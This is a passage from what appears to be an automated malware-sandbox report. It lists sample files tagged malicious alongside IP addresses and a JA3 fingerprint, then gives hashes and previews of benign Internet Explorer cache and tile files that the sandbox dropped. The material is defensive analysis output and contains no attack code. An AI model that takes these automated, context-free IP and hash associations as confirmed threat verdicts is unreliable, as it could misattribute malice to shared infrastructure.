                                                                                                                                                                                                                              • 172.67.205.83
                                                                                                                                                                                                                              20002.xlsxGet hashmaliciousBrowse
                                                                                                                                                                                                                              • 104.21.62.32
                                                                                                                                                                                                                              FIAA PO-200036452676.exeGet hashmaliciousBrowse
                                                                                                                                                                                                                              • 104.21.64.38
                                                                                                                                                                                                                              New Orders.exeGet hashmaliciousBrowse
                                                                                                                                                                                                                              • 104.21.19.200
                                                                                                                                                                                                                              YPJ-76577.exeGet hashmaliciousBrowse
                                                                                                                                                                                                                              • 104.21.19.200
                                                                                                                                                                                                                              inter snake.exeGet hashmaliciousBrowse
                                                                                                                                                                                                                              • 172.67.188.154
                                                                                                                                                                                                                              0PBOMB3aN9.exeGet hashmaliciousBrowse
                                                                                                                                                                                                                              • 104.21.88.245
                                                                                                                                                                                                                              VBELHQLOAs.exeGet hashmaliciousBrowse
                                                                                                                                                                                                                              • 162.159.134.233

                                                                                                                                                                                                                              JA3 Fingerprints

                                                                                                                                                                                                                              MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                                                                                                                                                                              9e10692f1b7f78228b2d4e424db3a98cV6oWh8Z20j.dllGet hashmaliciousBrowse
                                                                                                                                                                                                                              • 104.26.7.139
                                                                                                                                                                                                                              V6oWh8Z20j.dllGet hashmaliciousBrowse
                                                                                                                                                                                                                              • 104.26.7.139
                                                                                                                                                                                                                              481DGzXveG.dllGet hashmaliciousBrowse
                                                                                                                                                                                                                              • 104.26.7.139
                                                                                                                                                                                                                              Qf3znUYo2b.dllGet hashmaliciousBrowse
                                                                                                                                                                                                                              • 104.26.7.139
                                                                                                                                                                                                                              481DGzXveG.dllGet hashmaliciousBrowse
                                                                                                                                                                                                                              • 104.26.7.139
                                                                                                                                                                                                                              Qf3znUYo2b.dllGet hashmaliciousBrowse
                                                                                                                                                                                                                              • 104.26.7.139
                                                                                                                                                                                                                              Clti.xlsxGet hashmaliciousBrowse
                                                                                                                                                                                                                              • 104.26.7.139
                                                                                                                                                                                                                              Vernon.xlsxGet hashmaliciousBrowse
                                                                                                                                                                                                                              • 104.26.7.139
                                                                                                                                                                                                                              Activation Online Mail.htmGet hashmaliciousBrowse
                                                                                                                                                                                                                              • 104.26.7.139
                                                                                                                                                                                                                              Renee.schneider.htmlGet hashmaliciousBrowse
                                                                                                                                                                                                                              • 104.26.7.139
                                                                                                                                                                                                                              DAImS4qg20.dllGet hashmaliciousBrowse
                                                                                                                                                                                                                              • 104.26.7.139
                                                                                                                                                                                                                              2W6FcgEeMy.dllGet hashmaliciousBrowse
                                                                                                                                                                                                                              • 104.26.7.139
                                                                                                                                                                                                                              2zTgaLRFkL.dllGet hashmaliciousBrowse
                                                                                                                                                                                                                              • 104.26.7.139
                                                                                                                                                                                                                              619b721d39f71.dllGet hashmaliciousBrowse
                                                                                                                                                                                                                              • 104.26.7.139
                                                                                                                                                                                                                              619b721d39f71.dllGet hashmaliciousBrowse
                                                                                                                                                                                                                              • 104.26.7.139
                                                                                                                                                                                                                              AP_Remittance_SWT130003815_0.htmlGet hashmaliciousBrowse
                                                                                                                                                                                                                              • 104.26.7.139
                                                                                                                                                                                                                              Order Enquiry_CRM07540001965-pdf(109KB).exeGet hashmaliciousBrowse
                                                                                                                                                                                                                              • 104.26.7.139
                                                                                                                                                                                                                              0MGLPJiSa5.dllGet hashmaliciousBrowse
                                                                                                                                                                                                                              • 104.26.7.139
                                                                                                                                                                                                                              0MGLPJiSa5.dllGet hashmaliciousBrowse
                                                                                                                                                                                                                              • 104.26.7.139
                                                                                                                                                                                                                              malware.dllGet hashmaliciousBrowse
                                                                                                                                                                                                                              • 104.26.7.139

                                                                                                                                                                                                                              Dropped Files

                                                                                                                                                                                                                              No context

                                                                                                                                                                                                                              Created / dropped Files

                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Microsoft\Internet Explorer\DOMStore\EQAWN5DV\www.msn[2].xml
                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                                                              File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):139
                                                                                                                                                                                                                              Entropy (8bit):5.1927425956439235
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:3:D9yRtFwsx6wmxvFuqLHIfiAANEJGX7T4mEYldufUXVlNROqSmfRKb:JUFkduqsiAANEIXH4mE8dufEIOwb
                                                                                                                                                                                                                              MD5:97D066790F446B2355842BDC31161621
                                                                                                                                                                                                                              SHA1:79B67BB9C6CAAF003EA680A2A6709433CA6C1B32
                                                                                                                                                                                                                              SHA-256:F13D8638250DE1808D29F92C6B80F79DDF12C78A875577C87BECBC47B5F47377
                                                                                                                                                                                                                              SHA-512:C790616D0277A5017FF26E416A87FE216C22BC69F99C6224CDAAB9364B571546D994EEBE1426C5E81E928AF9B7F62C1FCFCB494CB48E743ADBE25444B9C7A985
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Preview: <root><item name="BT_AA_DETECTION" value="{&quot;ab&quot;:true,&quot;acceptable&quot;:false}" ltime="1230238320" htime="30924955" /></root>
                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Microsoft\Internet Explorer\DOMStore\IB42RK38\contextual.media[1].xml
                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                                                              File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):13
                                                                                                                                                                                                                              Entropy (8bit):2.469670487371862
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:3:D90aKb:JFKb
                                                                                                                                                                                                                              MD5:C1DDEA3EF6BBEF3E7060A1A9AD89E4C5
                                                                                                                                                                                                                              SHA1:35E3224FCBD3E1AF306F2B6A2C6BBEA9B0867966
                                                                                                                                                                                                                              SHA-256:B71E4D17274636B97179BA2D97C742735B6510EB54F22893D3A2DAFF2CEB28DB
                                                                                                                                                                                                                              SHA-512:6BE8CEC7C862AFAE5B37AA32DC5BB45912881A3276606DA41BF808A4EF92C318B355E616BF45A257B995520D72B7C08752C0BE445DCEADE5CF79F73480910FED
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Preview: <root></root>
                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Recovery\High\Active\RecoveryStore.{5EF2C13C-4C8E-11EC-90E5-ECF4BB2D2496}.dat
                                                                                                                                                                                                                              Process:C:\Program Files\internet explorer\iexplore.exe
                                                                                                                                                                                                                              File Type:Composite Document File V2 Document, Cannot read section info
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):5120
                                                                                                                                                                                                                              Entropy (8bit):1.9065712172685974
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:12:rl0YmGFLQrEgm2p+IaCyJBMu/GgCF/nlWrEgm2p+IaCyJBMu/GeF8Mu0G77/Mu07:rJQGW/4h+WGW/4hj8hth69lW/Hw
                                                                                                                                                                                                                              MD5:A7191FCBA7354DF63848F0E32E44E3B5
                                                                                                                                                                                                                              SHA1:CBD943E767E2A9158615DEF6B6D28E3CE3E21143
                                                                                                                                                                                                                              SHA-256:4D16881E8A8F181F7CB39F490E5B2548FD6A2E395409E081C4D38D4AF1F8035C
                                                                                                                                                                                                                              SHA-512:F21B5449868E60D6BC7D2A85A68DD001B2B798B1FC5CC41F8604480B143E372802F47E6C591AC692FE03AA7E9FFFD96B18634B80B2068AA3B5194A07F0F5C028
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Preview: ......................>.......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................R.o.o.t. .E.n.t.r.y..........................................................................................t.0..................K.j.j.a.q.f.a.j.N.2.c.0.u.z.g.v.1.l.4.q.y.5.n.f.W.e...........8...............................................................F.r.a.m.e.L.i.s.t.......................................................................................................0.......O._.T.S.P.c.H.y.X.o.5.M.7.B.G.Q.5.e.z.0.u.y.0.k.l.g.=.=.........:.......................................
                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Recovery\High\Active\{5EF2C13E-4C8E-11EC-90E5-ECF4BB2D2496}.dat
                                                                                                                                                                                                                              Process:C:\Program Files\internet explorer\iexplore.exe
                                                                                                                                                                                                                              File Type:Composite Document File V2 Document, Cannot read section info
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):330752
                                                                                                                                                                                                                              Entropy (8bit):3.59886128947096
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:3072:hZ/2Bfcdmu5kgTzGtIZ/2Bfc+mu5kgTzGt5Z/2Bfcdmu5kgTzGtfZ/2Bfc+mu5kn:Iz3M
                                                                                                                                                                                                                              MD5:F9F14BC733510635E8DB74A98E2766D6
                                                                                                                                                                                                                              SHA1:FA81A1035CE77D6B7B663C58AD1797828D5D556E
                                                                                                                                                                                                                              SHA-256:A0B2AD31B993E2675CF243039790059BA739A4DFD32757A289B06E51614C00E1
                                                                                                                                                                                                                              SHA-512:AA631E62C24848235EC85010B5F110CB4A0D66BF328AD9302ECCDFDF7FEC371B5CDB50FE6674A1A09A6EBAB5218362DFF3DA7B93430068EDAF761111F742513C
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Preview: ......................>...........................................................E...F...G...H...............................................................................................................................................................................................................................................................................................................................................................................................................................R.o.o.t. .E.n.t.r.y.........................................................................................p*.^..................K.j.j.a.q.f.a.j.N.2.c.0.u.z.g.v.1.l.4.q.y.5.n.f.W.e...........8.......................................................4.......T.r.a.v.e.l.L.o.g...............................................................................................................T.L.0...................................................................................................
                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Tiles\pin-17529550060\msapplication.xml
                                                                                                                                                                                                                              Process:C:\Program Files\internet explorer\iexplore.exe
                                                                                                                                                                                                                              File Type:XML 1.0 document, ASCII text, with very long lines, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):358
                                                                                                                                                                                                                              Entropy (8bit):5.0970008444066845
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:6:TMVBdc9EMdLD5Ltqc41Ep/VoIoUBtTD90/QL3WIZK0QhPPNbVDHkEtMjwu:TMHdNMNxOEpdoIoUBtnWimI00OVbVbkt
                                                                                                                                                                                                                              MD5:B1F3FAC4DE3508CF9AAE72B9A1D8954C
                                                                                                                                                                                                                              SHA1:EB9655A1ECB9D5318595DD148D6F408A8A4477BA
                                                                                                                                                                                                                              SHA-256:B64E776FCA454B340ECF26C3ABFE078D9BDD53BDDE029F1DF54187FFD323D3E2
                                                                                                                                                                                                                              SHA-512:AD0D6D8309FC9CEB8E31FA8DF5019BDE71D79EE884C27D0A32FD2D76849C77CECFC7511CE577FFDAA15F5FD9FF3CA017BB4638092CC972079229A0A05839FFC8
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Preview: <?xml version="1.0" encoding="utf-8"?>..<browserconfig><msapplication><config><site src="http://www.twitter.com/"/><date>0x5cea86ad,0x01d7e09b</date><accdate>0x5d098694,0x01d7e09b</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/><favorite src="C:\Users\user\Favorites\Twitter.url"/></tile></msapplication></browserconfig>..
                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Tiles\pin-18270793970\msapplication.xml
                                                                                                                                                                                                                              Process:C:\Program Files\internet explorer\iexplore.exe
                                                                                                                                                                                                                              File Type:XML 1.0 document, ASCII text, with very long lines, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):356
                                                                                                                                                                                                                              Entropy (8bit):5.137422073511568
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:6:TMVBdc9EMdLD5Ltqc4fLGTkpaO6TD90/QL3WIZK0QhPPNbkI5kU5EtMjwu:TMHdNMNxe2kpa7nWimI00OVbkak6EtMb
                                                                                                                                                                                                                              MD5:8B35A6C01C00BC38EFCA757A160B2E30
                                                                                                                                                                                                                              SHA1:F3BDBAF90522F5CC5D6016A4D5E609CBE5B97836
                                                                                                                                                                                                                              SHA-256:16F77854E3DBC6831657E31C9022B4D531D5283FEF93390A4B71CBC0CFF9C94D
                                                                                                                                                                                                                              SHA-512:FDF08DA827A5775558CE078D1C952AFC16BA0612F07DBBD01E4E0B72201DCB2BE0D9D4097A66837325CE216552FF0F8EFC214DCD91D3AFB383C47295CCD5916A
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Preview: <?xml version="1.0" encoding="utf-8"?>..<browserconfig><msapplication><config><site src="http://www.amazon.com/"/><date>0x5b317322,0x01d7e09b</date><accdate>0x5b507290,0x01d7e09b</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/><favorite src="C:\Users\user\Favorites\Amazon.url"/></tile></msapplication></browserconfig>..
                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Tiles\pin-21706820\msapplication.xml
                                                                                                                                                                                                                              Process:C:\Program Files\internet explorer\iexplore.exe
                                                                                                                                                                                                                              File Type:XML 1.0 document, ASCII text, with very long lines, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):362
                                                                                                                                                                                                                              Entropy (8bit):5.11461645242108
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:6:TMVBdc9EMdLD5Ltqc4GL1e+FR2TD90/QL3WIZK0QhPPNbyhBcEEtMjwu:TMHdNMNxvL1e+/2nWimI00OVbmZEtMb
                                                                                                                                                                                                                              MD5:4498C163B7201DC686B564823A2560B4
                                                                                                                                                                                                                              SHA1:957994F82B8714D568FE72D8B479F1F2D4359F3D
                                                                                                                                                                                                                              SHA-256:68E651B999E0D3C8C0296536AF9FC1483D7AFBFF7565F5F680F0E20AC06EDA1D
                                                                                                                                                                                                                              SHA-512:79A49770C9CD56A2FCE8EF42630440168A15AE4AAE3A1EE3AC6E8B237A896B561451D8E25375515774C68863EB91A3C74EA9ABC2EAE4DD15B9EFF8BE75A1BA0C
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Preview: <?xml version="1.0" encoding="utf-8"?>..<browserconfig><msapplication><config><site src="http://www.wikipedia.com/"/><date>0x5d2883df,0x01d7e09b</date><accdate>0x5d405a1e,0x01d7e09b</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/><favorite src="C:\Users\user\Favorites\Wikipedia.url"/></tile></msapplication></browserconfig>..
                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Tiles\pin-4759708130\msapplication.xml
                                                                                                                                                                                                                              Process:C:\Program Files\internet explorer\iexplore.exe
                                                                                                                                                                                                                              File Type:XML 1.0 document, ASCII text, with very long lines, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):352
                                                                                                                                                                                                                              Entropy (8bit):5.107217072236228
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:6:TMVBdc9EMdLD5Ltqc4JuBnotTD90/QL3WIZK0QhPPNbgE5EtMjwu:TMHdNMNxiVtnWimI00OVbd5EtMb
                                                                                                                                                                                                                              MD5:48CF4F5B7D7AD1490C663CA70A4C8E51
                                                                                                                                                                                                                              SHA1:A0514DE8485EA9215E5625D1D30128F0FDF0C609
                                                                                                                                                                                                                              SHA-256:A3CB4A5AA29D72BEF68F9B033CC17F0C6255F793DA917A22CB0674B644223167
                                                                                                                                                                                                                              SHA-512:66BF8EF55B701DC7E6628AE8A323636E0A56B903367986CDED7C995A4F32BEB3AB4B8FEB3BCA03CA45BF808F3462D7D001E6F0B08A24ED76555F3B5C9E7D9875
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Preview: <?xml version="1.0" encoding="utf-8"?>..<browserconfig><msapplication><config><site src="http://www.live.com/"/><date>0x5c0f2e19,0x01d7e09b</date><accdate>0x5c5b78e6,0x01d7e09b</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/><favorite src="C:\Users\user\Favorites\Live.url"/></tile></msapplication></browserconfig>..
                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Tiles\pin-6757900\msapplication.xml
                                                                                                                                                                                                                              Process:C:\Program Files\internet explorer\iexplore.exe
                                                                                                                                                                                                                              File Type:XML 1.0 document, ASCII text, with very long lines, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):358
                                                                                                                                                                                                                              Entropy (8bit):5.1228504566378605
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:6:TMVBdc9EMdLD5Ltqc4UxGwe0KVTD90/QL3WIZK0QhPPNb8K0QU5EtMjwu:TMHdNMNxhGwYnWimI00OVb8K075EtMb
                                                                                                                                                                                                                              MD5:C6B6BC244C99F61BABCE2FBCB22E64D9
                                                                                                                                                                                                                              SHA1:35A3081339A890731A22CB85DDFE5D4DC528B323
                                                                                                                                                                                                                              SHA-256:BEFD9D0864A11740FD1D2194421C6EA1B231F667F602F240F45B1AB2C0423DD0
                                                                                                                                                                                                                              SHA-512:FB00C826781DB7370F2C1A0059C5BE1248B0BEC93648A7953ADBB11A7336265E8DDC5F68148D9C1D91B3FF78CCF53D45A71F66A62B8D5A6F7642E72AB2BF11CA
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Preview: <?xml version="1.0" encoding="utf-8"?>..<browserconfig><msapplication><config><site src="http://www.youtube.com/"/><date>0x5d6da6d7,0x01d7e09b</date><accdate>0x5d8ca4fa,0x01d7e09b</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/><favorite src="C:\Users\user\Favorites\Youtube.url"/></tile></msapplication></browserconfig>..
                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Tiles\pin-8760897390\msapplication.xml
                                                                                                                                                                                                                              Process:C:\Program Files\internet explorer\iexplore.exe
                                                                                                                                                                                                                              File Type:XML 1.0 document, ASCII text, with very long lines, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):356
                                                                                                                                                                                                                              Entropy (8bit):5.081707677158787
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:6:TMVBdc9EMdLD5Ltqc4QunT7otTD90/QL3WIZK0QhPPNbAkEtMjwu:TMHdNMNx0nTktnWimI00OVbxEtMb
                                                                                                                                                                                                                              MD5:47652013AFC9AF67190B37EB614D396C
                                                                                                                                                                                                                              SHA1:C51501AC8B9CEF00D071F79E4CD282D716D6BB4D
                                                                                                                                                                                                                              SHA-256:3AF31E81025325A3632FB3E16B9C8DC5682F93DC5855DC430A3F02B1DE861D57
                                                                                                                                                                                                                              SHA-512:EA8D363513CA0A607616EEC8B9B943CD746D2C84E9CBB620358EB41BBB1B7F2C37C17FE8E7D71EF44FF1839DD109F3576CF2A21DFA97EB5F8A56DFE7E7A815F3
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Preview: <?xml version="1.0" encoding="utf-8"?>..<browserconfig><msapplication><config><site src="http://www.reddit.com/"/><date>0x5cb613fa,0x01d7e09b</date><accdate>0x5cd510d6,0x01d7e09b</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/><favorite src="C:\Users\user\Favorites\Reddit.url"/></tile></msapplication></browserconfig>..
                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Tiles\pin20259167780\msapplication.xml
                                                                                                                                                                                                                              Process:C:\Program Files\internet explorer\iexplore.exe
                                                                                                                                                                                                                              File Type:XML 1.0 document, ASCII text, with very long lines, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):358
                                                                                                                                                                                                                              Entropy (8bit):5.15587133580377
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:6:TMVBdc9EMdLD5Ltqc4oTMKg5WTD90/QL3WIZK0QhPPNb6Kq5EtMjwu:TMHdNMNxxMVcnWimI00OVb6Kq5EtMb
                                                                                                                                                                                                                              MD5:0EB17AA2E180F04788F785319FC39B4C
                                                                                                                                                                                                                              SHA1:2248ADB5B5FE871D76E86773E8FD163AE17CF4CA
                                                                                                                                                                                                                              SHA-256:258975832AD973D8DC8314326734FFB84E3375CF48009530E522D2BAEC9C4030
                                                                                                                                                                                                                              SHA-512:56204FCEFB628C2B7A0A161B0C08034811F0244073574B6E1C11D6464D2DE4964A60C75B1C79DD50022BCE14688FB08AD2D4153224A6282C618CC3C8B851FD2B
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Preview: <?xml version="1.0" encoding="utf-8"?>..<browserconfig><msapplication><config><site src="http://www.nytimes.com/"/><date>0x5c781627,0x01d7e09b</date><accdate>0x5c971518,0x01d7e09b</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/><favorite src="C:\Users\user\Favorites\NYTimes.url"/></tile></msapplication></browserconfig>..
                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Tiles\pin20332743330\msapplication.xml
                                                                                                                                                                                                                              Process:C:\Program Files\internet explorer\iexplore.exe
                                                                                                                                                                                                                              File Type:XML 1.0 document, ASCII text, with very long lines, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):360
                                                                                                                                                                                                                              Entropy (8bit):5.11597956611254
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:6:TMVBdc9EMdLD5Ltqc4YX2nxbCR3+tTD90/QL3WIZK0QhPPNb02CqEtMjwu:TMHdNMNxcVCRGnWimI00OVbVEtMb
                                                                                                                                                                                                                              MD5:AD6D14E1F6A7EAB6D68C17CB61A79D32
                                                                                                                                                                                                                              SHA1:9C00B35B4962FBA3522CA4984A835ACFC52FDB4B
                                                                                                                                                                                                                              SHA-256:0B97A3543161D5EAC060D387075AB6C6298C2DD0FDCDC45066BACFA6D6BD2770
                                                                                                                                                                                                                              SHA-512:35EACE8ECC26E15D1A1E5D6C7CD7D331B6ED28084053C2153C479267E785CC916F30CC7C9578C16E259ECBB9629083BCF7526FA4E1592309161D3F0C8574E447
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Preview: <?xml version="1.0" encoding="utf-8"?>..<browserconfig><msapplication><config><site src="http://www.facebook.com/"/><date>0x5b7697ab,0x01d7e09b</date><accdate>0x5bc2e279,0x01d7e09b</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/><favorite src="C:\Users\user\Favorites\Facebook.url"/></tile></msapplication></browserconfig>..
                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Tiles\pin8215062560\msapplication.xml
                                                                                                                                                                                                                              Process:C:\Program Files\internet explorer\iexplore.exe
                                                                                                                                                                                                                              File Type:XML 1.0 document, ASCII text, with very long lines, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):356
                                                                                                                                                                                                                              Entropy (8bit):5.109820030314615
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:6:TMVBdc9EMdLD5Ltqc4In1Mb3UBtTD90/QL3WIZK0QhPPNbiwE5EtMjwu:TMHdNMNxfnm3YtnWimI00OVbe5EtMb
                                                                                                                                                                                                                              MD5:38BA1865E79F13A9C6144FF8805DAC18
                                                                                                                                                                                                                              SHA1:A7FB833B9D86256754C01619C379BD9000A86300
                                                                                                                                                                                                                              SHA-256:E83FD15047BD1631464CA165C076679E74EF52B207D974DCE1508DDCF7EB3E49
                                                                                                                                                                                                                              SHA-512:A01720EC47223E0B36EFD56B3E67C3771D3AB77527853A33A7E9A407502DF489A500CAF7C963798F77ABCAA99FF714F6C02B0255AF09C664C1E1AB6750EEEA51
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Preview: <?xml version="1.0" encoding="utf-8"?>..<browserconfig><msapplication><config><site src="http://www.google.com/"/><date>0x5bd858d8,0x01d7e09b</date><accdate>0x5bf75616,0x01d7e09b</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/><favorite src="C:\Users\user\Favorites\Google.url"/></tile></msapplication></browserconfig>..
                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Microsoft\Internet Explorer\imagestore\wlm7n14\imagestore.dat
                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):21318
                                                                                                                                                                                                                              Entropy (8bit):4.109053117861958
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:96:yQQQQQtzS29dcBUXqYkE1fwDzXrzS29dcBUXqY:bzSAcBykEBczbzSAcBq
                                                                                                                                                                                                                              MD5:AFAFED39473C261B5057A5DADAB60447
                                                                                                                                                                                                                              SHA1:4646A2A85D04594044597A771FE5912685023281
                                                                                                                                                                                                                              SHA-256:D87F66224329BD8EED915F49DAA1F5A7B13984A941E3D7FA1586CE164CDC7112
                                                                                                                                                                                                                              SHA-512:81B24BECA1D93E4EEF591EFD1A9A5AD27D96B4B355DCEA8E4A6F3B192F50E133B8934F4FA3B67C2A5774178AA770D7BD2CDE029088C4A5E75A38DCA2B3ABD466
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Preview: ........%.h.t.t.p.s.:././.w.w.w...m.i.c.r.o.s.o.f.t...c.o.m./.f.a.v.i.c.o.n...i.c.o.~(................h(......(....................(....................................."P.........................................."""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333""""""""""""""""""
                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3Y2ADQKS\4996b9[2].woff
                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                                                              File Type:Web Open Font Format, TrueType, length 45633, version 1.0
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):45633
                                                                                                                                                                                                                              Entropy (8bit):6.523183274214988
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:768:GiE2wcDeO5t68PKACfgVEwZfaDDxLQ0+nSEClr1X/7BXq/SH0Cl7dA7Q/B0WkAfO:82/DeO5M8PKASCZSvxQ0+TCPXtUSHF7c
                                                                                                                                                                                                                              MD5:A92232F513DC07C229DDFA3DE4979FBA
                                                                                                                                                                                                                              SHA1:EB6E465AE947709D5215269076F99766B53AE3D1
                                                                                                                                                                                                                              SHA-256:F477B53BF5E6E10FA78C41DEAF32FA4D78A657D7B2EFE85B35C06886C7191BB9
                                                                                                                                                                                                                              SHA-512:32A33CC9D6F2F1C962174F6CC636053A4BFA29A287AF72B2E2825D8FA6336850C902AB3F4C07FB4BF0158353EBBD36C0D367A5E358D9840D70B90B93DB2AE32D
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Preview: wOFF.......A...........................,....OS/2...p...`...`B.Y.cmap.............G.glyf.......,...,0..Hhead.......6...6....hhea...,...$...$....hmtx............($LKloca...`...f...f....maxp...P... ... ....name............IU..post....... ... .*...........I.A_.<........... ........d.*.......................^...q.d.Z.................................................................3.......3.....f..............................HL .@...U...f.........................................\.d.\.d...d.e.d.Z.d.b.d.4.d.=.d.Y.d.c.d.].d.b.d.I.d.b.d.f.d._.d.^.d.(.d.b.d.^.d.b.d.b.d...d...d._.d._.d...d...d.P.d.0.d.b.d.b.d.P.d.u.d.c.d.^.d._.d.q.d._.d.d.d.b.d._.d._.d.b.d.a.d.b.d.a.d.b.d...d...d.^.d.^.d.`.d.[.d...d...d.$.d.p.d...d...d.^.d._.d.T.d...d.b.d.b.d.b.d.i.d.d.d...d...d...d.7.d.^.d.X.d.].d.).d.l.d.l.d.b.d.b.d.,.d.,.d.b.d.b.d...d...d...d.7.d.b.d.1.d.b.d.b.d...d...d...d...d...d.A.d...d...d.(.d.`.d...d...d.^.d.r.d.f.d.,.d.b.d...d.b.d._.d.q.d...d...d.b.d.b.d.b.d.b.d...d.r.d.I.d._.d.b.d.b.d.b.d.V.d.Z.d.b.d
                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3Y2ADQKS\55a804ab-e5c6-4b97-9319-86263d365d28[1].json
                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                                                              File Type:ASCII text, with very long lines, with no line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):3278
                                                                                                                                                                                                                              Entropy (8bit):4.87966793369991
